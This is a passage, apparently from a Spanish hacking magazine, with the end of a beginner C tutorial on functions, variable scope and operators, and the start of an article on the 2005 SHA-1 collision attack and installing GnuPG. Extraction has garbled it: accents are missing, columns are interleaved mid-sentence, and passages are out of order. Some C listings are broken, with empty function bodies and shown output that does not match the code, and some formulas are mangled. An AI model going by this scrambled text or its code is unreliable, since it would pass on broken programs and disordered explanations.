no tiene ningn parmetro de entrada.
Bien, vamos avanzando bastante y hasta

ahora no se ha complicado mucho la
cosa. Siguiendo con el ejemplo, vemos
que detrs de nuestra funcin main hay
unas llaves de apertura y de cierre donde
hay ms cdigo metido. Bien a todo lo
que hay entre { y }, se llama en C
bloque de cdigo y se ejecuta todo
juntito cada vez que se entra en dicho
bloque de cdigo. En nuestro caso se
ejecuta al entrar en la funcin main, que
se activa o mejor dicho y hablando con
propiedad, es llamada, siempre que se
ejecuta el programa que estamos hacien
do.
Vemos tambin que hay otra funcin:
printf. Esta funcin recibe como par
metros un texto y lo presenta en panta
lla... Me ests engaando, me podis
decir, porque yo ah veo algo ms que
texto. Y no os faltara razn. Pero dejad
que os aclare que hay muchas formas
de presentar un texto y que de momento
nos valdr con esta definicin para esta
funcin. Cuando se vean punteros y
dems podremos ver su definicin de
forma ms precisa.
Pero os debo explicar cmo lo hemos
utilizado en este caso. Fijmonos bien y
tomemos un ejemplo de nuestro progra
ma:
printf("El tamao en memoria del
tipo char es %o byte\n",
sizeof(char));
Bien, tenemos, segn lo que he explicado
anteriormente en nuestro prototipo de
funcin que no hay nada como ti
po valor retorno. No nos preocupar
ahora en exceso, pero no poner nada y
poner void (que es nada, curioso,
verdad?) viene a ser lo mismo, con lo
cual nos podemos ahorrar el ponerlo. De
hecho, os animo a probar el cdigo an
terior suprimiendo los void de main y
veris como no cambia en nada el resul
tado. nimo valientes, que no se diga.
Luego tenemos (El tamao en memo
ria del tipo char es %o es by
te\n,sizeof(char));. Bien, entre los
parntesis vienen los argumentos de la
funcin prinft. Esta funcin, como trabaja
con cadenas, lo que hace es recibir ca
denas. Premio a la coherencia, que se

llama ;-). Y en las cadenas podemos
incluir valores de variables, que van
luego separadas por comas. Y para incluir
su valor dentro de la cadena que quere
mos sacar por pantalla, pues nada mejor
que poner un smbolo del porcentaje y
luego una letra, que nos indica el tipo
de la variable que queremos sacar
por pantalla. En este caso o representa
un valor octal, i para enteros, f para
nmeros en coma flotante...
Luego el valor que sustituye en la salida
a %o es sizeof(char), que es un ope
rador monario (mandeee?, tranquilos,
ms adelante se ver, de momento es
para que nos suene) que nos dice el
tamao en bytes de una variable en
memoria. A este operador se le puede
pasar una variable o como en este caso,
un tipo.
Bien, con esto uno se queda con la
sensacin de que no sabe absolutamente
nada de C. Y la verdad es que no est
muy equivocado. Pero como en todos
los comienzos, hay que ir pasito a pasito
y viendo y comprendiendo bien los pilares
de la programacin. Que una funcin se
invoque de una forma u otra no debe
molestarnos/preocuparnos ahora. Para
eso hay ayuda a patadas dentro del
propio compilador.
Una vez vistos los tipos bsicos que hay

en C vamos a adentrarnos ms en las
variables, que son bsicas en todo pro

grama. Hemos dicho que son como ca
jones donde guardamos datos (papeles,
libretas, lo que sea) de un tipo deter
minado. Ahora bien, dnde estn en
un programa?.
Bueno, para nuestro alivio, no tenemos
que saber dnde estn, sino que podemos
etiquetar dichos cajones con un nombre
que nos sea significativo. A esto se le
llama identificador. En C deben empezar
con una letra, un smbolo (de subra
yado) y luego pueden seguirle letras y/o
nmeros. El nico smbolo que podemos
usar es el como parte de la etiqueta
que pongamos a nuestros cajones. Como
toda etiqueta, para que sea til debe ser
representativa de lo que guarda nuestro
cajn. Por tanto si en un cajn guardamos
un papel con nuestro salario, pondremos
salario a dicha variable. De otro modo al
mirar el identificador no sabremos qu es
lo que guarda.
La longitud, puede ser la que queramos,
pero slo los 31 primeros caracteres
sern significativos para nuestro compi
lador, con esto tenemos ms que sufi
ciente.
C es un lenguaje bastante ordenado. Me
explico: no nos deja meter nada en un
cajn, si previamente no lo hemos com
prado/ordenado hacer. Obvio, verdad?
Pues a esto se le llama declarar una
variable. As el compilador lo que hace
es reservar espacio en memoria para
dicha variable. La forma de declarar una

variable en C es la siguiente:
tipo variable_1, variable_2, ..., variable_n;
Aqu se declaran varias variables del

mismo tipo. En este caso variable 1,
variable 2, ..., variable n, son lo que
hemos llamado anteriormente como iden
tificadores.
Hasta ahora vamos pasando de la oscu
ridad a la luz poquito a poco. Mientras
uno aprende ve tambin un concepto
que es absolutamente fundamental: vi
sibilidad de las variables. Es decir qu
partes del programa ven a qu variables
y en funcin de qu criterios esto es as.
Para que nos quede algo claro: en C las
llaves (de los bloques de cdigo {})
hacen que el resto del programa no vea
un pijo dentro de ah. Es como si cerrasen
un armario (bloque de cdigo) donde
podemos tener cajones (variables). Por
lo tanto slo desde dentro de ese armario
son accesibles los distintos cajones.
Vamos a ver otro programita, para relajar
un poco el tostn :P. Un ejemplo de esto
que digo.(ver listado 3)
Bueno al compilar y ejecutar tenemos
lo siguiente:(ver listado 4)
Primero hay que explicar cmo hemos
declarado las variables aqu. Dijimos que
declararlas era comprar o encargar los
cajones. Tcnicamente lo que hacemos
/* Segundo programa en C */
// Libreras para E/S
#include <stdio.h>
main()
{
// Declaramos varias variables
int empleados = 3000;
float salario = 1500.37;
char caracter = 's';
printf("El nmero de empleados es: %i, con un salario de %f \n",empleados,salario);
// Definimos un bloque de cdigo con variables que slo pueden verse desde dicho bloque
{
printf("El valor de la variable tipo char del bloque externo a este es %c\n",caracter);
}
}
Listado 3
47
popolous@Ulises Programas C $ gcc segundo.c -o segundo

popolous@Ulises Programas C $ ./segundo
El nmero de empleados es: 3000, con un salario de 1500.369995
El nmero de empleados es: 110, con un salario de 2400.560059
El valor de la variable tipo char del bloque externo a este es s
Listado 4
es reservar memoria para dichas varia
bles. En este caso sera as:
Adems, hemos inicializado dicha va
riable, que no es ms que darle un valor
inicial. Es decir, el cajn nos lo ven
den/dan con algo dentro que nosotros
queramos ya, no tenemos que meterle
nosotros nada. Y como veis y aprovecho
para decirlo, toda sentencia (lnea de
cdigo) en C debe acabar con un ;, si
no, dar error.
Aqu se ve claramente que las variables
empleadas y salario que se definieron
dentro del bloque de cdigo pueden ver
a las otras variables fuera de l (como la
variable de tipo char llamada carcter
en un rapto de originalidad por mi parte).
Sin embargo, desde fuera no podemos
acceder. Si intentamos lo siguiente, ahora
veremos la gracia de C :P.(ver listado
5)(ver listado 6)
Est muy claro que nos ha mandado
cerca el programa. Vemos que nasty no

est accesible por la funcin main. Sin
embargo el bloque s que poda acceder
a las variables de main. Pero... qu
pasa con las variables que tienen el
mismo nombre en el bloque que en la
funcin principal? Pues nada, simplemen
te que al entrar en el bloque quedan
enmascaradas por las que se definen en
el bloque de cdigo.
A este tipo de variables, se les llama
variables locales, porque slo son ac
cesibles desde la propia funcin (en este
caso main) o desde el propio bloque de
cdigo donde son declaradas. Sin embar
go, si las declaramos fuera de main
(antes de esta funcin), se llaman glo
bales. Estas variables son visibles para
todo el cdigo y funciones del fichero
donde sean declaradas.
Y hay ms formas de variables, pero eso
lo dejo para una quizs para una
ampliacin. De momento con esto es
ms que suficiente para empezar a ma
nejarnos con C.
Un tipo especial de variable, segn dicen

los manuales es la constante. Esto que
puede parecer raro, no lo es tanto, ya
que luego la definen como una variable
que no puede cambiar su valor y se
quedan tan panchos. Hala, si en los
exmenes se pudiesen arreglar dudas
as de sencillo... En fin, una constante
pues se declara igual que si fuese una
variable, con su tipo y todo, slo que
vamos a decirle al compilador que no
cambie su valor, anteponiendo la palabra
clave const. Se inicializa al mismo tiempo
que se declara, ya que como el programa
no puede modificar su valor, pues es la
nica forma en que podemos asignarle
algo.
Es un cajn con llave en el que le decimos
al carpintero que meta algo que nosotros
sabemos lo que es, lo podemos ver y
usar (es transparente como el resto de
cajones, ya veis, estos son cajones es
peciales), pero no podemos abrirlo para
cambiar lo que tiene dentro.
Un ltimo tipo de variable que nos va a
hacer mucha falta es el de variable
parametrizada, que no son ms que
los parmetros que se le pasan a una
funcin para poder operar con ellos. El
utilizar parmetros para definir las fun
ciones nos va a valer para poder hacerlas
ms reutilizables.
/* Tercer programa en C */
// Libreras para E/S
#include <stdio.h>
main()
{
// Declaramos varias variables
char caracter = 's';
// Definimos un bloque de cdigo con variables que slo pueden verse desde dicho bloque
{
char nasty = 'n';
printf("El valor de la variable tipo char del bloque externo a este es %c\n",caracter);
}
printf("Bonito error al tratar de leer %c\n",nasty);
}
Listado 5
48
popolous@Ulises Programas C $ gcc tercero.c -o tercero

tercero.c: En la funcin `main':
tercero.c:23: error: `nasty' undeclared (first use in this function)
tercero.c:23: error: (Each undeclared identifier is reported only once
tercero.c:23: error: for each function it appears in.)
se llama producto que no tiene ningn

parmetro y que devuelve un entero.
Hemos declarado la funcin producto.
La definicin est al final del cdigo, en
las lneas:
// Aqu definimos la funcin
Listado 6
// producto y cmo opera

int producto(void)
No es lo mismo definir dos variables

globales y luego una funcin que multi
plique los dos nmeros contenidos en
esas dos variables globales, por ejemplo,
que una funcin que acepte dos nmeros
como argumentos (variables de entrada
o paso de argumentos como se llama en
programacin) y devuelva su producto.
Como el movimiento se demuestra an
dando, ah va un ejemplo de una funcin
producto que no se puede reutilizar (hay
que definir dos variables globales en
cada nuevo programa que hagamos) y
otra que s. Observad vosotros mismos
las diferencias. Algo de la elegancia de
C (y en general de los lenguajes de
programacin estructurados) se puede
ver aqu.(ver listado 7)
En este vemos que la funcin producto

no es reutilizable, en el sentido de que
no la podemos separar y compilar en un
archivo aparte como librera (veremos
ms de esto en futuras entregas).
Antes de pegar el cdigo con una funcin
un poco ms reutilizable, vamos a ver
la diferencia entre declaracin de una
funcin, definicin de una funcin y
llamada a una funcin.
Podemos ver que al igual que las varia
bles las funciones en C deben declararse
para poder usarse, en este caso eso lo
hacemos con la lnea:
int producto(void);
Con esta lnea ya le indicamos al compi
lador que vamos a usar una funcin que
{
return (numero1*numero2);
}
Que no es ms que repetir la declaracin

y aadir el bloque de cdigo correspon
diente delimitado por llaves. Para que
una funcin devuelva un valor se usa
return y luego el valor que puede estar
en forma explcita como en este caso, a
travs de una expresin o tambin se
poda haber hecho:
// Aqu definimos la funcin
// producto y cmo opera
int producto(void)
{
int resultado;
resultado = numero1*numero2;
return resultado;
}
/* Cuarto programa de C */
// Importamos la librera estndar de E/S en C
#include <stdio.h>
// Declaramos una funcin que devuelve el producto de dos nmeros enteros
int producto(void);
// Variables globales a utilizar
int numero1 = 0;
int numero2 = 0;
// Tambin se podra haber hecho ya que todas son del mismo tipo:
// int numero1, numero2;
main()
{
// Damos valores enteros a las variables globales
numero1 = 7;
numero2 = 15;
// Calculamos su producto y lo mostramos por pantalla
printf("El valor del producto de %d y %d es: %d\n",numero1,numero2,producto());
}
// Aqu definimos la funcin producto y cmo opera
int producto(void)
{
}
Listado 7
49
A m b a s f o r m a s s o n e q u i va l e n t e s .
Para la llamada a una funcin vamos a
usar el otro ejemplo:(ver listado 8)
Para terminar y que podis hacer algunas

cositas ya en C, voy a explicar muy
rpidamente los operadores que hay en
Este programa tiene pocas cosas que

explicar. Voy a matizar una variante que
no apareca en el anterior:
C (los principales), por si queris ir

experimentando con ellos y ampliar ma
teria ;-).
int producto(int,int);
Aqu la declaracin indica cantidad de
argumentos y el tipo que tienen esos
argumentos: dos enteros. Aparte, el tipo
de retorno de la funcin.
La llamada a la funcin se produce en
esta lnea:
resultado = producto(numero1,numero2);
Aqu se llama a producto y el valor que

devuelve, se asigna a una variable. As,
sin quererlo ni beberlo hemos visto
asignacin de variables (aunque algo se
vio cuando habl de inicializacin de las
mismas). Para que esta expresin tenga
sentido en C, deben ser, a priori, del
mismo tipo. Y digo a priori porque no
tiene por qu ser necesariamente as.
Pero por el momento, como estamos
empezando, vamos a hacer asignaciones
como $DEITY manda. Ya habr ocasin
de rizar el rizo.
Bien, pues con esto ya casi est lo que
quera contar en este primer artculo.
Bien, de modo telegrfico vamos a ver los

operadores. En C tenemos de los siguientes
tipos:
Aritmticos.
Igual que los de matracas: operador de
suma (+), resta (-), multiplicacin (*),
divisin (/) - este operador funciona dis
tinto si la divisin es entre nmeros enteros
o reales, resto de la divisin entera (%),
que slo funciona entre nmeros enteros.
Todos estos son binarios, es decir, actan
con dos operandos: sumandos en la suma,
minuendo y sustraendo en la resta, divi
dendo y divisor en la divisin, multiplican
dos, etc.
Tambin tenemos operadores aritmticos
monarios, es decir que actan sobre un
slo elemento. Estos son incremento (++)
y decremento (--). Un ejemplo para que
lo tengis ms claro:
Incremento: Se puede poner ++x; o
tambin x++; y es equivalente a poner
x = x + 1;. La diferencia entre ambos se

ve clara con este ejemplo:
x = 10;
y = x++;
Cuando esto se ejecuta x queda como 11
e y como 10, ya que primero se hace la
asignacin y luego el incremento. En cam
bio en:
x = 10;
y = ++x;
En ambos casos ambas variables tendrn
el valor de 11 (si no me creis sera buen
ejercicio que lo comprobarais). En estos
dos ejemplos x siempre toma el valor de
11, pero la diferencia est en cundo
cambia de valor (antes o despus de la
asignacin).
Decremento: En este caso sera -x; o
tambin x--. Con las mismas diferencias
entre la forma prefija (la primera) y la
postfija (la segunda) que para el caso del
incremento.
Tambin se pueden abreviar asignaciones
si en ambos lados interviene la misma
variable. Por ejemplo:
x = x + 3;
Se puede abreviar poniendo simplemente:
/* Quinto programa de C */
// Importamos la librera estndar de E/S en C
#include <stdio.h>
// Declaramos una funcin que devuelve el producto de dos nmeros enteros
int producto(int,int);
main()
{
int numero1, numero2, resultado;
numero1 = 7;
numero2 = 15;
resultado = producto(numero1,numero2);
// Calculamos su producto y lo mostramos por pantalla
printf("El valor del producto de %i y %i es: %i\n",numero1,numero2,resultado);
}
// Aqu definimos la funcin producto y cmo opera
int producto(int numero1,int numero2)
{
}
Listado 8
50
x += 3;
Y esto se puede hacer tambin con -=,
*=, /=. Pero ojo, la misma variable en
ambos sitios. Aunque luego venga todo
un chorizo detrs. Si tenemos:
Variable = Variable operador algo
Se puede reducir a su forma equivalente:
Variable operador= algo;
Relacionales y lgicos.
Estos tipos se usan para determinar una
relacin (operadores relacionales) y las
formas en que estas relaciones pueden
c o n e c t a r s e ( o p e ra d o r e s l g i c o s ) .
Dentro de los primeros tenemos los que
ya sabris todos por matemticas:
Mayor que (>)
Menor que (<)
Mayor o igual que (>=)
Menor o igual que (<=)
Igual que (==)
Distinto (!=)
Desplazamiento a la izquierda <<
Y los lgicos:
Hay ms (como sizeof (), ?, la coma ,

como operador, para punteros), pero los
dejaremos para ms adelante, que si no,
esto es un empacho y hay que mantener
el inters por aprender este fascinante
lenguaje de programacin. Como regalito
final os dejo una tabla de precedencia de
todos los operadores que tiene C para
futuras referencias y para que la tengis,
claro est ;-).
Y lgico (&&) (Verdad s y slo s los

dos operandos son ciertos)
O lgico (||) (Verdad si al menos uno
de ellos es verdadero)
NO (!)
En el caso de los lgicos he puesto un
resumen de la tabla de verdad de ellos.
Unos y otros se combinan para formar
expresiones que nos permitirn control
de flujo de programas y otras cosillas ms
que se irn viendo a lo largo del curso.
Por ltimo, voy a citar a los operadores a
nivel de bits y que tambin utilizaremos
alguna vez, de momento aqu os los pre
sento:
Antes de despedirme hasta el prximo

nmero os digo que a estas alturas, sabis,
al menos, tanto como yo sobre C... y si
habis sido curiosos ms an. Os invito a
que practiquis y machaquis estos con
ceptos y si tenis dudas, estar encantado
de responderlas en el foro:
http://www.hackxcrack.com/phpBB2/in
dex.php
Hasta el siguiente artculo. Espero que
haya sido de vuestro agrado. Para cualquier
sugerencia y/o crtica, fe de erratas, estar
gustoso de recibirlas en el foro. Saludos.
Y (&) a nivel de bits

O (|) a nivel de bits
O exclusiva (^) XOR
Complemento a uno ~
Desplazamiento a la derecha >>
PON AQU TU PUBLICIDAD

Contacta DIRECTAMENTE con
nuestro coordinador de publicidad
610 52 91 71
precios desde
INFRMATE
sin compromiso!
99 euros
51
Bienvenidos de nuevo al rincn ms crptico de la revista. Espero que el primer artculo os haya
gustado. :-)
En este segundo artculo vamos a conocer al "hermano libre" de PGP, GnuPG, adems de conocer
algunas de las interfaces grficas disponibles para el mismo. Como ya conocemos las bases del
funcionamiento del sistema OpenPGP del artculo anterior, no tiene sentido repetirlas de nuevo...
pero s vamos a profundizar un poquito ms. Si alguien se siente perdido con toda la teora del
sistema, puede echar mano del artculo anterior para aclararse.
Pero antes de entrar de lleno con nuestro querido GnuPG, vamos a hablar de algo que est de ac
tualidad en el mundo de la criptografa y que, aunque os pueda parecer lo contrario, est muy rela
cionado con el sistema OpenPGP. Al que no le interese mucho esta parte, puede saltar tranquilamen
te a la parte de GnuPG, siempre que no le importe arder eternamente en las llamas del infierno
reservado a los "faltos de curiosidad". }:-D
Es curioso ver que el mundo de la criptografa, donde mu

cha gente piensa que ya est todo inventado, est tan vivo
como estuvo en los tiempos de Bletchley park y Mr. Turing.
Hace un par de meses, en el artculo anterior, mientras ex
plicaba los algoritmos hash dije:
<<SHA-1 (Secure Hash Algorithm), 1994. SHA-1 naci de
manos del NIST como ampliacin al SHA tradicional. Este
algoritmo, pese a ser bastante ms lento que MD5, es mu
cho ms seguro, pues genera cadenas de salida de 160
bits (a partir de entradas de hasta 2^64 bits) que son mu
cho ms resistentes a colisiones simples y fuertes.>>
Pues parece que el destino quiso quitarme la razn, porque
apenas unos das despus de que saliera a la venta la re
vista, el 15 de Febrero, salta la liebre en las comunidades
dedicadas a la criptografa: Bruce Schneier ha publicado
en su blog una bomba: SHA-1 ha sido roto:
http://www.schneier.com/blog/archives/2005/02/sha1 bro
ken.html
52
Qu? Roto?? Comienzan las elucubraciones y la gente

comienza a opinar sobre las implicaciones de este hecho...
pero en realidad todava no se conocen ni los detalles, solo
una somera nota de los resultados obtenidos por los inves
tigadores Xiaoyun Wang, Yiqun Lisa Yin, y Hongbo Yu (Uni
versidad de Shandong, China).
Si nos atenemos al algoritmo SHA-1 propiamente dicho,
este ataque ha permitido su criptoanlisis en 2^69 opera
ciones frente a las 2^80 que cabran esperar en un algorit
mo de su clase y longitud. Qu significa eso realmente?
An no se conocen los detalles y tampoco si este ataque
logr obtener colisiones simples, colisiones fuertes...
Dos das despus, el da 17, pudimos tener acceso a un
documento original con los resultados (fechado el da 13
de Febrero), pero en l no se trata el ataque a SHA-1, sino
nicamente uno al SHA original y otro a una versin sim
plificada de SHA-1.
http://theory.csail.mit.edu/~yiqun/shanote.pdf
Al da siguiente, el da 18, el mismo

Bruce Schneier publica en su blog ms
detalles sobre el criptoanlisis aplicado
a SHA-1:
http://www.schneier.com/blog/archive
s/2005/02/cryptanalysis o.html
En los foros, listas y comunidades de
seguridad se sigue hablando tmida
mente del tema, pero realmente poca
gente comprende las implicaciones rea
les, a corto y medio plazo, que ha teni
do este ataque sobre el que es, hoy por
hoy, el principal algoritmo hash en la
criptografa moderna.
Antes de nada, deberamos hacer un
pequeo repaso a las caractersticas de
un algoritmo hash para entender bien la
explicacin:
Unidireccional: Una funcin hash
es irreversible, y dada una salida
de la misma, es computacional
mente imposible recomponer la
entrada que la gener.
Compresin: Dado un tamao
c u a l q u i e ra d e e n t ra d a p a ra l a
funcin hash, la salida de la mis
ma ser de una longitud fija.
Difusin: La salida de la funcin
hash es un resumen complejo de
la totalidad de la entrada, es decir,
se usan TODOS los bits de la mis
ma.
Resistencia a las colisiones sim
ples: Esta propiedad nos indica
que dado un valor de entrada de
la funcin hash, es computacional
mente imposible encontrar otra
entrada que genere el mismo va
lor de salida.
Resistencia a las colisiones fuer
tes: Esta propiedad nos indica que
es computacionalmente muy difcil
encontrar dos valores de entrada
que generen un mismo valor de
salida.
Como podemos ver, tenemos tres carac
tersticas "fijas" que son implementadas
en el propio algoritmo: unidireccionali
dad (tambin conocida como resistencia
a la preimagen), compresin y difusin.
Las debilidades, por tanto, se nos pue
den presentar en la resistencia a las co
lisiones simples (tambin conocida co
mo resistencia a la segunda preimagen)
y en la resistencia a las colisiones fuer

tes (tambin conocida como resistencia
a la colisin).
Debemos tener en cuenta un par de co
sas cuando pensemos en las colisiones
de un sistema de hash:
El conjunto de los posibles valores de
entrada tiene cardinal infinito, puesto
que en principio podemos aplicar el al
goritmo de hash a cualquier entrada.
Esto no se cumple para SHA-1 en con
creto, dado que est limitado a entradas
de tamao menor o igual a 2^64 bits.
Por tanto para SHA-1 concretamente
nos encontramos con 2^(2^64) posi
bles entradas, es decir, 2^(1.8*10^19).
No he calculado el valor concreto (ms
que nada porque Kcalc se desborda :-D)
pero es una autntica burrada y para
nosotros eso nos vale como infinito...
El conjunto de posibles valores de sa
lida tiene un cardinal finito que viene
definido por 2^n donde n es el nmero
de bits de la salida generada, es decir,
por la propiedad de compresin. En
SHA-1 tenemos 2^160 posibles salidas
(1.46*10^48).
De estas dos propiedades deducimos
que es imposible que toda entrada ten
ga una salida diferente, puesto que el
cardinal del conjunto de entrada es ma
yor que el de salida. As pues, si gene
ramos (2^160)+1 mensajes, ser inevi
table que al menos dos de ellos posean
el mismo valor de hash.
Hasta ah la teora de las colisiones. En
la prctica encontramos dos tipos de co
lisiones:
Colisiones simples: Si dado un mensa
je de entrada concreto, somos capaces
de encontrar otro de forma que ambos
posean el mismo valor de hash, nos en
contramos ante una colisin simple.
Colisiones fuertes: Si somos capaces
de encontrar dos mensajes de entrada
con un mismo valor de hash, nos en
contramos ante una colisin fuerte.
Y es la hora de hablar de colisiones y
cumpleaos (y que conste que an no
he perdido la cabeza).
Vamos a trasladar las colisiones simples
a un ejemplo que sea ms fcil de dige
rir... imaginad que un hombre entra en
una fiesta y desea saber las posibilida
des de que otra persona cumpla aos el

mismo da que l. Para los que no ten
gan la combinatoria muy al da o no les
apetezca pensar mucho, las posibilida
des son 1-(364/365)^n. Es decir, para
que las posibilidades sean superiores al
50% es necesario que haya 253 perso
nas en esa fiesta.
Ahora pensemos en las colisiones fuer
tes... imaginemos ahora que queremos
estudiar las probabilidades de que dos
personas cuales quiera cumplan aos el
mismo da. Las posibilidades ahora son
1-[365!/(365^n*(365-1)!)], o sea que
ahora nicamente son necesarias 23
personas o ms para que las posibilida
des sean superiores al 50%.
A este modelo matemtico se le conoce
como "ataque del cumpleaos".
Y qu significa esto en la prctica?
Significa que si quisiramos lanzar un
ataque de fuerza bruta contra un algorit
mo de hash de n bits, necesitaramos
realizar tericamente 2^n operaciones
para encontrar una colisin simple, mien
tras que para encontrar una colisin fuer
te necesitaramos realizar nicamente
2^(n/2). En el caso particular de SHA-1
nos encontramos con que en teora seran
necesarias 2^160 operaciones para obte
ner una colisin simple y 2^80 para obte
ner una colisin fuerte.
Supongo que ahora ya se entienden un
poco mejor las implicaciones del ataque
a SHA-1. Como hemos dicho, la teora
nos dice que para obtener una colisin
fuerte necesitaramos 2^80 operacio
nes, y mediante el ataque del que esta
mos hablando se obtiene en solamente
2^69 operaciones. Puede parecer que
no es mucha, pero dado que cada bit en
el exponente duplica la complejidad (co
mo ya dije en el primer artculo), la di
ferencia entre 2^69 y 2^80 es enorme,
unas dos mil veces ms sencillo (con
cretamente 2^11, 2048).
Las implicaciones prcticas de esto a
corto plazo no son tan graves como mu
cha gente se aventur a anunciar. El
sistema OpenPGP no ha dejado de ser
seguro, pues aunque SHA-1 sea dos mil
veces ms sencillo de comprometer, si
gue siendo una tarea muy compleja.
Adems, para poder falsificar un men
saje sera necesario encontrar una
53
colisin simple, y eso sigue requiriendo

2^160 operaciones, lo cual es a todas
luces seguro. Lo que s sera posible es
crear dos mensajes cuya firma sea la
misma, y aunque no es lo mismo, s es
algo a tener en cuenta.
A largo plazo las implicaciones son peo
res, dado que la potencia de clculo au
menta constantemente, y lo que hoy es
complicado, maana es sencillo... el
precalcular colisiones fuertes en SHA-1
ya solo es cuestin de el tiempo que se
quiera invertir en ello.
No obstante, el alarmismo que ha cundi
do es injustificado, pues hay muchos sis
temas que han sido rotos, como MD5,
SHA-0, DES y otros tantos, que siguen
siendo usados. De hecho, como coment
en el primer artculo, MD5 sigue siendo
un estndar de facto, y hace mucho tiem
po que fue comprometido en una forma
similar a la que acaba de serlo SHA-1. La
diferencia est en que ahora mismo se
confa en MD5 para tareas de "baja" se
guridad (como checksums de imgenes
ISO) mientras que se confa en SHA-1
para aplicaciones ms crticas, como fir
ma y certificados digitales.
Qu camino va a tomar la comunidad
criptogrfica? La gente de la PGP
Corporation ya han anunciado que en su
cesivas versiones incluirn nuevos algo
ritmos, sin prisa, pero de forma segura.
As mismo se va mirando hacia nuevos
Si es factible, no obstante, la
implementacin de versiones ms po
tentes de RIPEMD, como RIPEMD-320.
Tiger: Algoritmo de hash de 192 bits
diseado en 1996 por Ross Anderson y
Eli Biham. Est especialmente optimiza
da para ser utilizada en procesadores de
64 bits, y es vista con buenos ojos por
los expertos. Podis encontrar ms
informacin sobre Tiger en:
http://www.cs.technion.ac.il/~biham/Re
ports/Tiger/
WhirPool: Algoritmo de hash de 512
bits diseado por Vincent Rijmen y
Paulo S. L. M. Barreto. No es muy cono
cido, y dado que gran parte de su con
fiabilidad se basa en su gran longitud,
resulta bastante lento computacional
mente hablando. Podis leer ms sobre
WhirPool en:
http://planeta.terra.com.br/informatica/
paulobarreto/WhirlpoolPage.html
En cualquier caso, el futuro no parece
pasar por la convocacin de un concur
so al estilo AES para que la comunidad
internacional lance sus propuestas y de
ellas salga el nuevo estndar de has
hing. Algunos expertos, entre ellos
Bruce Schneier, ya lo estn pidiendo.
Bien, espero que ahora tengis ms cla
ras las implicaciones del ataque criptoa
naltico sobre SHA-1. Ahora podemos
meternos de lleno con GnuPG. :-)
algoritmos para reponer al herido SHA-1:

SHA-256, SHA-384, SHA-512: Versio-
PGP se inclinar por alguno de estos al

goritmos. Podis encontrar ms informacin acerca de ellos en:
http://csrc.nist.gov/encryption/shs/sha2
56-384-512.pdf
RIPEMD-160: Algoritmo de hash de
160 bits diseado por Hans Dobbertin,
Antoon Bosselaers, y Bart Preneel.
Definitivamente no es un sustituto de
SHA-1, pues tambin ha sufrido ataques
de criptoanlisis que han permitido en
contrar colisiones:
http://eprint.iacr.org/2004/199.pdf
54
La versin 1.0.0 de GPG fue liberada el

7 de Septiembre de 1999, y desde en
tonces han continuado publicndose
versiones actualizadas. Actualmente las
ltimas versiones disponibles son la
1.4.0 de la rama estable y la 1.9.15 de
la rama de desarrollo. Como en otros
casos de software crtico, recomiendo
encarecidamente optar siempre por la
versin estable.
A la hora de realizar las prcticas con
GPG, podris seguirlas con cualquier
sistema soportado (o sea, que los usua
rios de Windows podis tambin disfru
tar de GPG :-P), si bien la parte en que
tratamos las diversas interfaces grficas
est dedicada para los usuarios de sis
temas Unix-like (y ms concretamente,
GNU/Linux). Los "windowseros" que no
se me quejen, que el de PGP fue entero
para ellos... ;-)
Las versiones que yo he utilizado para
desarrollar el artculo son:
nes de 256, 384 y 512 bits respectiva

mente de SHA. Corren rumores de que
Existen muchas ventajas derivadas de

que GPG sea software libre, como por
ejemplo la gran cantidad de sistemas
soportados (GNU/Linux, GNU/Hurd,
FreeBSD, OpenBSD, NetBSD, Microsoft
Windows, PocketConsole, Mac OS X,
AIX, BSDI, HPUX, IRIX, MP-RAS, OSF1,
OS/2, SCO UnixWare, SunOS, Solaris y
USL UnixWare) o la disponibilidad total
de su cdigo fuente (y no nicamente
como material de consulta, como en el
caso de PGP). Los que me conocen sa
ben que soy fiel defensor del software
libre, pero no es ste el sitio para hablar
de las ventajas de usar este tipo de
software... nicamente quera apuntar
algunas ventajas de GPG sobre PGP.
GNU Privacy Guard (al que nos referire

mos como GPG) es una implementacin
libre del sistema OpenPGP (descrito en
el RFC #2440, como ya dijimos en el
artculo anterior). Ofrece compatibilidad
con PGP e implementa todos los mismos
algoritmos que ste menos el algoritmo
de cifrado simtrico IDEA, por ser ste
an un algoritmo patentado en ciertos
pases. An as, es posible aadir la
implementacin del mismo al sistema
hasta que sea oficialmente includo en
2007 (cuando caduque la patente).
El sitio oficial de GPG es:
http://www.gnupg.org/
GnuPG 1.4.0-2 bajo GNU/Linux

Debian SID.
GPA 0.7.0-1 bajo GNU/Linux Debian
SID.
Kgpg 3.3.2-1 bajo GNU/Linux Debian
SID.
GnuPG 1.4.0 bajo Microsoft Windows
XP SP1. (Pero alguien usa el Spyware
Pack 2? :-D)
Para instalar GPG hay dos opciones: ba
jar los binarios precompilados, o bien
compilar nosotros mismos el cdigo
fuente de la aplicacin.
Lo ms cmodo es utilizar los binarios
precompilados (los que seis debianitas
como yo... apt-get install gnupg :-P),

pero an as vamos a ver cmo compi
lar nosotros mismos el programa en sis
temas Linux.
Lo primero es bajar el paquete con las

fuentes de la siguiente direccin:
ftp://ftp.gnupg.org/gcrypt/gnupg/gnup
g-1.4.0.tar.gz
Para comprender mejor los co
mandos de consola que vamos a
utilizar, es imprescindible que co
nozcis al menos por encima el
significado del prompt de la shell
de Linux. En mi artculo os encon
traris con dos tipos de ellos:
master@blingdenstone:~$
Podemos dividir este prompt en
tres partes:
La primera son los datos del usua
rio: "master", que es el usuario
que est ejecutando la shell;
"blingdenstone" que es el dominio
en el que se encuentra el usuario
(en este caso, el nombre de la
mquina); y el smbolo "@" que
denota pertenencia. As pues
"master@blingdenstone" significa
"esta sesin es del usuario master,
perteneciente al dominio blingden
stone".
El smbolo ":" denota la separacin entre las dos partes del
prompt.
La segunda parte del prompt son
los datos relativos a la sesin: en
primer lugar tenemos el directorio
de trabajo y que en este caso es
"~", smbolo con el que denota
mos al directorio home del usuario
que ejecuta la shell; y luego un
smbolo que puede ser "$" "#"
para usuarios sin privilegios y con
privilegios respectivamente.
La tercera parte es el propio co
mando que nosotros introducimos,
y que puede ser lo que nos d la
gana.
Por tanto, este prompt significara
a grandes rasgos "el usuario mas
t e r, p e r t e n e c i e n t e a l d o m i n i o
blingdenstone, que se encuentra

en su directorio home y que no
dispone de privilegios especiales,
desea ejecutar...".
El otro tipo de prompt que veris
es:
blingdenstone:/home/master#
Es igual que el anterior pero con
un pequeo detalle: no especifica
el usuario que est ejecutando la
shell. Esto es as porque (y esto
nos lo indica el smbolo "#") el
usuario en este caso es el root de
la mquina, y por tanto se denota
su prompt nicamente con el
nombre de la misma.
Este prompt significara "el root
del dominio blingdenstone, que se
